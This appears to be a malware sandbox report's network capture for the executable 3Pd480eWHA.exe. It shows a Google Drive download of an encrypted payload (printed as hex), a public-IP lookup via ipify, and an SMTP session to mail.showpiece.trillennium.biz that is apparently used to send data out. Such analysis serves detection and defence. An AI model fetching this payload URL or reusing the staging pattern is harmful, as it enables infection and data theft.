                                                                                            Nov 6, 2024 15:07:18.337968111 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:18.338027954 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:18.338077068 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:18.340405941 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:18.340475082 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:18.340478897 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:18.340528965 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:18.342577934 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:18.342637062 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:18.342643023 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:18.342689991 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:18.344696045 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:18.344754934 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:18.344796896 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:18.344831944 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:18.344888926 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:20.152411938 CET49976443192.168.2.7104.26.13.205
                                                                                            Nov 6, 2024 15:07:20.152456999 CET44349976104.26.13.205192.168.2.7
                                                                                            Nov 6, 2024 15:07:20.152548075 CET49976443192.168.2.7104.26.13.205
                                                                                            Nov 6, 2024 15:07:20.156575918 CET49976443192.168.2.7104.26.13.205
                                                                                            Nov 6, 2024 15:07:20.156599045 CET44349976104.26.13.205192.168.2.7
                                                                                            Nov 6, 2024 15:07:20.775672913 CET44349976104.26.13.205192.168.2.7
                                                                                            Nov 6, 2024 15:07:20.775758982 CET49976443192.168.2.7104.26.13.205
                                                                                            Nov 6, 2024 15:07:20.780370951 CET49976443192.168.2.7104.26.13.205
                                                                                            Nov 6, 2024 15:07:20.780384064 CET44349976104.26.13.205192.168.2.7
                                                                                            Nov 6, 2024 15:07:20.780678034 CET44349976104.26.13.205192.168.2.7
                                                                                            Nov 6, 2024 15:07:20.786159039 CET49976443192.168.2.7104.26.13.205
                                                                                            Nov 6, 2024 15:07:20.831330061 CET44349976104.26.13.205192.168.2.7
                                                                                            Nov 6, 2024 15:07:20.961016893 CET44349976104.26.13.205192.168.2.7
                                                                                            Nov 6, 2024 15:07:20.961088896 CET44349976104.26.13.205192.168.2.7
                                                                                            Nov 6, 2024 15:07:20.961227894 CET49976443192.168.2.7104.26.13.205
                                                                                            Nov 6, 2024 15:07:20.967459917 CET49976443192.168.2.7104.26.13.205
                                                                                            Nov 6, 2024 15:07:22.519633055 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:22.524544001 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:22.524653912 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:23.087625027 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.087908030 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:23.092946053 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.246176958 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.246522903 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:23.251425028 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.396857023 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.397721052 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:23.403626919 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.610822916 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.610846996 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.610907078 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:23.612127066 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.612198114 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.612246990 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:23.641388893 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:23.646380901 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.788686991 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.792026043 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:23.796963930 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.938817024 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:23.939986944 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:23.944909096 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.089066029 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.090225935 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:24.095186949 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.245270014 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.245683908 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:24.250618935 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.392576933 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.392993927 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:24.397852898 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.593230009 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.593599081 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:24.598747015 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.743731976 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.744533062 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:24.744597912 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:24.744623899 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:24.744645119 CET49977587192.168.2.767.23.226.139
                                                                                            Nov 6, 2024 15:07:24.749486923 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.749500036 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.749593019 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.912033081 CET5874997767.23.226.139192.168.2.7
                                                                                            Nov 6, 2024 15:07:24.962271929 CET49977587192.168.2.767.23.226.139
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 6, 2024 15:07:12.613677025 CET5077953192.168.2.71.1.1.1
                                                                                            Nov 6, 2024 15:07:12.620842934 CET53507791.1.1.1192.168.2.7
                                                                                            Nov 6, 2024 15:07:14.276115894 CET6505053192.168.2.71.1.1.1
                                                                                            Nov 6, 2024 15:07:14.283618927 CET53650501.1.1.1192.168.2.7
                                                                                            Nov 6, 2024 15:07:20.140635967 CET6409153192.168.2.71.1.1.1
                                                                                            Nov 6, 2024 15:07:20.147927046 CET53640911.1.1.1192.168.2.7
                                                                                            Nov 6, 2024 15:07:22.006927967 CET6527253192.168.2.71.1.1.1
                                                                                            Nov 6, 2024 15:07:22.518410921 CET53652721.1.1.1192.168.2.7
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Nov 6, 2024 15:07:12.613677025 CET192.168.2.71.1.1.10xc763Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 15:07:14.276115894 CET192.168.2.71.1.1.10x87cdStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 15:07:20.140635967 CET192.168.2.71.1.1.10x436cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 15:07:22.006927967 CET192.168.2.71.1.1.10x9687Standard query (0)mail.showpiece.trillennium.bizA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Nov 6, 2024 15:07:12.620842934 CET1.1.1.1192.168.2.70xc763No error (0)drive.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 15:07:14.283618927 CET1.1.1.1192.168.2.70x87cdNo error (0)drive.usercontent.google.com142.250.186.129A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 15:07:20.147927046 CET1.1.1.1192.168.2.70x436cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 15:07:20.147927046 CET1.1.1.1192.168.2.70x436cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 15:07:20.147927046 CET1.1.1.1192.168.2.70x436cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 15:07:22.518410921 CET1.1.1.1192.168.2.70x9687No error (0)mail.showpiece.trillennium.bizshowpiece.trillennium.bizCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 6, 2024 15:07:22.518410921 CET1.1.1.1192.168.2.70x9687No error (0)showpiece.trillennium.biz67.23.226.139A (IP address)IN (0x0001)false
                                                                                            • drive.google.com
                                                                                            • drive.usercontent.google.com
                                                                                            • api.ipify.org
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.749974172.217.16.2064433260C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-06 14:07:13 UTC216OUTGET /uc?export=download&id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Host: drive.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2024-11-06 14:07:14 UTC1610INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Wed, 06 Nov 2024 14:07:13 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'nonce-RsjFXQaSUXWjqV4V0PSAiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.749975142.250.186.1294433260C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-06 14:07:15 UTC258OUTGET /download?id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa&export=download HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-11-06 14:07:17 UTC4921INHTTP/1.1 200 OK
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Security-Policy: sandbox
                                                                                            Content-Security-Policy: default-src 'none'
                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                            X-Content-Security-Policy: sandbox
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Content-Disposition: attachment; filename="DMymenWYIulA201.bin"
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Credentials: false
                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 240192
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:33:23 GMT
                                                                                            X-GUploader-UploadID: AHmUCY1U_5DIJuWHyF3c_qrdCMCbfGjnGcOL635RyXEFeJUG09CQTK4NY6YdxicpQL46mFROf-eyPZJgww
                                                                                            Date: Wed, 06 Nov 2024 14:07:17 GMT
                                                                                            Expires: Wed, 06 Nov 2024 14:07:17 GMT
                                                                                            Cache-Control: private, max-age=0
                                                                                            X-Goog-Hash: crc32c=qvmHug==
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-11-06 14:07:17 UTC4921INData Raw: 01 0d 7e 10 8c 12 dc 62 4a 5b 04 a4 38 3e e2 34 6f e0 a0 8f 88 a7 7e 23 dc 91 13 c6 86 a0 1a 28 5e 08 6c 3d 35 ee 6c 26 02 02 12 4a 41 bb c7 1e 7a c6 77 31 b6 63 25 24 c2 79 67 a0 ab 6e 99 3b 3b f0 54 5e d0 20 89 3b ff 81 ca 76 fc 72 f7 af 49 83 fe 02 e6 f1 27 a7 69 69 41 c5 c7 c4 c5 c1 b4 a1 9b 80 12 d0 71 6e 6a e0 79 bf 7d 57 62 2e 12 8e 17 eb c3 b3 82 88 39 f7 66 e6 ae b7 df 78 84 1e 18 c9 1d 45 0b b2 15 7b ba 39 75 ed 63 16 53 c2 7e 4c 43 88 5d 60 49 e0 f4 0f e7 aa 1c 43 db 92 28 f2 a6 5a b4 b8 4a c4 c6 6a 47 7b bc 7b 34 fd 85 7b c9 60 12 25 cf 39 00 e4 8a 06 95 71 58 9b 1f 8e f3 c8 ce 8e db c3 69 4f 46 b9 f6 58 86 3b 3d 21 e0 55 b6 ca 03 3c 7e 81 6d fd ac 7f d7 7e 7d 5b 0a f5 55 df fc c0 7c 44 50 03 97 5d 96 40 fc c6 78 48 ec b3 48 cd 7c 66 35 30 57
                                                                                            Data Ascii: ~bJ[8>4o~#(^l=5l&JAzw1c%$ygn;;T^ ;vrI'iiAqnjy}Wb.9fxE{9ucS~LC]`IC(ZJjG{{4{`%9qXiOFX;=!U<~m~}[U|DP]@xHH|f50W
                                                                                            2024-11-06 14:07:17 UTC4856INData Raw: 5c 08 e9 ba 29 97 48 2f 67 ab 1f cf c6 c5 dc e3 28 2e a8 3d 1d ba 58 ca 3b 76 fc 2f fc 7d bd fa 9d f5 19 dc 0b 20 d8 92 6b 2a c1 9d cd d4 71 97 99 63 7a fc a8 f1 6b 84 fc 75 e1 89 06 3c e2 6e 8c 20 a0 0c fd 44 35 d1 6a 46 7c f6 ce 8f 79 e9 21 7d 7f f1 5f ba 26 c7 b9 fc a1 ee 66 92 9e 43 3c 4a 24 39 8b 15 b4 50 e1 68 ad 6a 2c 45 ef ae ba 33 c2 94 46 6b f1 b8 1a c3 01 3e a3 e1 8a 0b 91 cb 8e 00 4c 9a cc 42 f3 a4 74 d3 ad e8 fa 2f 72 0f 91 03 5b 9b 99 fe 22 d1 05 d0 f5 b7 0e 05 a9 9d 3f dd 4a c4 1f d5 92 64 af 5e 75 99 6c dd b5 46 06 6f a9 7d 40 82 1d e5 7a 44 58 66 06 2f 71 df 74 99 b8 36 2f f1 08 2c 81 5b 91 b7 c0 ff 44 87 84 fb b7 d8 07 02 26 cf 61 33 f1 95 7e 3a 9e 25 b2 87 5b fc 42 84 ed 2c 00 46 ab c4 5a 2d 2c 8b 3b 05 88 ca 76 6c 95 f7 af fb fe cc 03
                                                                                            Data Ascii: \)H/g(.=X;v/} k*qczku<n D5jF|y!}_&fC<J$9Phj,E3Fk>LBt/r["?Jd^ulFo}@zDXf/qt6/,[D&a3~:%[B,FZ-,;vl
                                                                                            2024-11-06 14:07:17 UTC1323INData Raw: e0 69 70 91 df 54 bc e8 21 83 c0 8c f8 31 82 d1 7b ea 12 cf 4f 26 f0 fa d9 e0 9d f9 28 8c 2e bd 86 6b f7 e2 f1 34 ad a3 6e 97 a7 28 d5 ee ac e9 d6 29 5d 54 45 b0 26 46 a4 d0 92 99 11 00 6c e0 c2 c4 12 fb 50 cb 71 19 f8 1b 38 47 a5 01 b5 2b 34 03 7c 63 5a 08 49 16 19 76 d3 76 3a 95 04 ed 1e c1 00 0a 68 79 b2 0c b0 d8 33 0c 75 df 06 2b 2b 10 cf 49 46 9b 28 e9 7b 7a 8a fe 0d a1 61 86 e7 e8 70 61 d0 5a 66 f8 d4 4c 31 f0 ac 45 da b4 7c a6 78 67 48 fa 3b fa d5 65 47 59 ff ad be 4b ef 31 a7 5b d1 2f e3 f4 8d 0e 42 c3 f7 64 cf b6 ea 37 55 e4 a1 36 50 75 32 6a 91 ee 42 0c 13 62 4b f3 27 05 3c fb d1 75 d1 da 63 7d 2a 95 01 89 02 b2 91 73 17 0c d5 f2 3b 77 9e 43 9b 5e 1f 27 1f 23 08 59 c4 61 d5 33 5b 00 b9 af 60 37 e8 ba d7 99 ba 23 63 55 33 c0 c6 e5 fc 1d 29 17 47
                                                                                            Data Ascii: ipT!1{O&(.k4n()]TE&FlPq8G+4|cZIvv:hy3u++IF({zapaZfL1E|xgH;eGYK1[/Bd7U6Pu2jBbK'<uc}*s;wC^'#Ya3[`7#cU3)G
                                                                                            2024-11-06 14:07:17 UTC1378INData Raw: 19 54 45 4f d6 4b a4 d0 4c 86 12 00 4c 1b cc c8 12 05 af fe 6b 19 d8 1f c6 4b a5 ff 4a 1e 17 03 3c c2 5b fd b6 36 37 49 d3 76 ce bb 17 ed 1e 3f 66 51 40 19 b2 0c ba 26 c3 09 4c f5 03 2b 2b 10 11 46 4a 9b 28 e9 79 75 8a de e7 ad 62 86 39 ef 49 7a d0 a4 67 3f dd 48 31 d8 aa 40 da be f0 da 8e 99 b6 fb 1f fa d5 45 41 69 fc ad 59 44 e3 31 af a5 dd 32 c3 d4 84 0e 42 3d 07 66 f6 98 ef 36 55 1a ad cd 5c 5e 73 4a 94 e4 bc 02 ed 63 52 ef 27 05 3c fb d3 79 d1 24 91 70 26 d5 3b 8a 02 b2 b1 8b 16 35 cf 0c 35 74 60 4f 67 52 e2 2b 3e 21 67 1b c4 9f de f4 44 03 b9 8f 9a 3b e8 ba d7 99 b7 23 43 a8 3f cc c6 3b d2 1e 29 17 47 31 1e ba 86 c2 3a 76 02 df fd 44 be fe 9d f5 e7 2b 05 24 a4 f1 95 26 c1 63 e1 d7 71 69 95 9c 7b ed b8 f1 6b af 71 6f e1 89 2c c7 ec 6f 8c fe ac 0f fd
                                                                                            Data Ascii: TEOKLLkKJ<[67Iv?fQ@&L++FJ(yub9Izg?H1@EAiYD12B=f6U\^sJcR'<y$p&;55t`OgR+>!gD;#C?;)G1:vD+$&cqi{kqo,o
                                                                                            2024-11-06 14:07:17 UTC1378INData Raw: 58 ff 8d 40 45 e3 31 98 0b dd 23 e3 f4 86 0e 42 c3 f7 6b f5 a0 ea c9 59 19 ad 13 54 5d 73 6a 6f e5 85 0c 13 62 6b c1 a8 05 3c 05 ff 7c d1 da 9d 8f 28 96 21 8a fc be 92 8d 36 3d cf f2 3b 89 61 76 97 5e e1 2b 26 53 67 1b c4 41 d6 cd 55 03 47 81 67 37 e8 44 25 94 b6 03 68 ab 3f cc 38 c4 e5 3d 29 17 b9 c3 14 ba a6 bd 5e 76 02 25 02 70 9c fe e6 92 19 22 01 4b e3 92 95 20 e5 91 ed d5 71 69 97 9e 7b c5 44 fd 68 84 af 61 e1 89 0c 3c ed 56 86 00 a2 0c fd 64 ca df 6e 46 82 06 c1 8b 79 37 29 7e 7f d1 ad bb 1f e1 47 fd 98 99 67 92 9e 0b 11 40 24 39 b5 e3 41 af 1e 10 1f 66 2c 4f 31 a6 bb 33 3c b5 43 69 0f b7 39 c6 29 0d a3 1f 82 25 91 d0 40 09 48 8a ed 40 f3 af 74 2d bd f1 7b 2f 72 0f 91 01 59 9b d2 8b 20 d1 03 2e 05 b9 0d fb 85 9d 3f af 4d 3a 1e 9c e1 55 ae 5e 49 ba
                                                                                            Data Ascii: X@E1#BkYT]sjobk<|(!6=;av^+&SgAUGg7D%h?8=)^v%p"K qi{Dha<VdnFy7)~Gg@$9Af,O13<Ci9)%@H@t-{/rY .?M:U^I
                                                                                            2024-11-06 14:07:17 UTC1378INData Raw: c4 77 3b 2b fc 7d 9d fe bd f4 19 22 05 da d6 92 95 26 3b 91 ed d5 51 93 99 9d 7b 3b bb c8 6e 84 8f 61 d9 8c 0c c2 ec 57 de ff 5d f3 d7 44 cb df 75 76 7e 08 22 8b 79 c9 29 7d 7f e0 81 bb 1f e1 b9 02 af 9e 67 aa 1f 33 14 40 24 c7 81 3f bc 70 e0 6e 53 66 d2 44 f6 b3 ba 33 c2 42 48 69 f1 c5 4e c6 01 3a 8b 43 84 0f 9b f1 dd 0c 48 9a cc 42 f3 a4 74 d3 a2 d3 7b 2f 8c 03 6d 0f 7a 99 ea f8 20 2f 02 17 e9 b5 0e fb 85 9f 3f af 4d 3a 11 a5 ef 75 ad 5e 71 67 9e d1 b7 6e 0e 91 a5 79 32 b9 1d e5 0a 6c b3 67 3f 2f 8f d1 77 99 66 3a 2c f1 7a cd 8f 59 e1 9f 28 f3 46 8d d6 bf b7 d8 77 d4 30 f6 64 39 8c ba 47 3f 9a db be bd 21 71 ee 7b 13 55 7d 76 d1 b1 5e d3 24 ac c5 f5 80 ca 88 0e 8d f7 87 ac 83 fe 08 18 f8 27 a7 52 1d 41 c5 c3 ec c3 c1 b4 a7 65 89 12 d0 03 55 68 e0 09 c2
                                                                                            Data Ascii: w;+}"&;Q{;naW]Duv~"y)}g3@$?pnSfD3BHiN:CHBt{/mz /?M:u^qgny2lg?/wf:,zY(Fw0d9G?!q{U}v^$'RAeUh
                                                                                            2024-11-06 14:07:17 UTC1378INData Raw: e9 70 0c 48 64 e5 40 f3 81 0f 59 ac d1 7f 5d f0 0b 6f 7f 72 80 ea f8 2a ac 77 2e fb b1 2e ba a5 9f 3f 51 43 c4 1f a5 11 59 ae 5e 51 65 60 df b5 90 0f 56 bb 7b 32 99 e3 ec 0a 6c 65 2b 06 25 89 f1 74 99 46 3b d2 ff 7a 33 81 a5 ed 9f d6 df 4d 8d f6 bc 49 d9 4e 09 31 cf 61 c7 85 ba 7f 12 df db be 83 a5 87 10 84 cd 2f 7d 76 aa 3a 5f 8c 19 84 39 fb 81 ea 7c 03 8d f7 51 ff 83 fe 02 18 fd 27 a7 09 7e 41 c5 c7 3a c4 f8 be a1 9b 80 38 f0 69 6e 6a e0 87 b1 7d 57 62 d0 1e 8e 17 cb 89 b3 82 88 c7 f6 5f ec 2e b7 df 52 aa 4a a2 c7 1d 0f 0c 7f 34 c3 45 79 b8 cc 17 1f 3a b1 5e c2 30 de 18 12 28 8d 2a 65 86 c4 57 57 db b2 4a 93 f4 a4 c5 d6 1a 85 b3 4a 03 3e 92 2f 59 92 e5 3e 85 6d 1f 2f 15 37 00 e4 8a f8 99 71 08 fe 2d 8e bf c9 33 8f 7e 0c 03 29 46 93 d6 6b 86 3b 3d df 0e
                                                                                            Data Ascii: pHd@Y]or*w..?QCY^Qe`V{2le+%tF;z3MIN1a/}v:_9|Q'~A:8inj}Wb_.RJ4Ey:^0(*eWWJJ>/Y>m/7q-3~)Fk;=
                                                                                            2024-11-06 14:07:17 UTC1378INData Raw: 73 76 aa c4 a0 df 20 89 1b e8 81 ca 76 fd 8c ce 8d f1 83 fe fc ef f1 27 82 52 1d 41 c5 c3 b6 17 c5 b4 d1 b3 9b 12 d0 7b 13 1e e0 79 bb 5d 43 62 2e 12 70 19 eb c3 b3 7c 84 39 f7 46 da 2e b7 df 86 8b 38 b5 c7 1d f1 fc 76 35 c3 9b 05 b8 cc 37 3e 51 4c a1 c3 11 da 3a 12 28 73 da 6c 86 c4 8c 20 af b2 6a 9f 86 28 c1 28 6b 94 a2 4a 03 34 c5 7b 50 92 e1 1e 19 63 1f 2f eb c7 0c e4 8a 26 ac 71 08 de e1 8f 86 de cd 8e 47 f8 0a 28 46 99 fb 58 86 3b 7d 8e ff aa 4b eb 32 3d 75 81 93 53 af 7f d7 88 71 5b 0a d5 70 df c2 7f 81 45 69 01 97 5d 96 7e f6 c6 78 6d d7 c7 48 ed 78 14 eb 36 57 6d 21 f3 7f 3f 8f 8f 86 1c 98 8d ff e6 83 63 07 c8 4e 9e 17 21 12 00 a6 12 be 8a e5 21 75 41 1c ec 68 3a 16 97 53 6c c0 e2 2a f4 12 d4 26 3e a7 de b6 ec e5 ce c6 67 96 c5 65 34 87 f0 78 a2
                                                                                            Data Ascii: sv v'RA{y]Cb.p|9F.8v57>QL:(sl j((kJ4{Pc/&qG(FX;}K2=uSq[pEi]~xmHx6Wm!?cN!!uAh:Sl*&>ge4x
                                                                                            2024-11-06 14:07:17 UTC1378INData Raw: 60 d0 dc 4a 03 30 cf 63 59 92 e1 e0 e9 6d 1f 2f 15 35 00 e4 aa 0d 95 71 08 20 1e b7 b5 c9 cd 8e 6d 26 0f 29 46 b9 08 56 86 3b 3d df 0c 55 b4 eb 5a 3d 75 81 93 5c 96 5d d7 76 7d a5 03 f5 55 fa b9 0b 7f 44 54 51 1d 58 96 f0 d7 dd 78 48 a6 ce 3c ed 7c 62 15 61 57 1d 09 16 71 3f 85 f2 0c 10 98 89 ff ca 83 63 07 c8 41 a7 35 21 ec 0c 58 1b 9e a1 c0 5a 01 bf 1d d1 38 ae 13 97 dd 4d db e2 0f 85 1b a0 26 3a d1 14 b9 ec 95 e6 23 69 96 cf 18 be 8b f0 7c a2 a5 d2 13 a4 e8 81 5e 7c 55 93 03 ff 3f 1e 63 8b 8b 03 48 d7 88 8d dc 90 5d aa 65 76 79 ba 8f 50 06 45 6d 72 6e 1a a0 c2 f1 61 49 88 68 9d f0 35 3c c0 c5 b3 5c 3d 4a 04 b7 fe fc 2f f9 12 bd 69 10 99 f2 d3 c8 6e 6c 14 28 31 ef c8 86 1f 81 7d 7d 46 e7 87 ab 85 08 85 cb 28 89 56 e5 6a 95 81 f7 7d 6a 6b 8e 75 b6 d1 44
                                                                                            Data Ascii: `J0cYm/5q m&)FV;=UZ=u\]v}UDTQXxH<|baWq?cA5!XZ8M&:#i|^|U?cH]evyPEmrnaIh5<\=J/inl(1}}F(Vj}jkuD
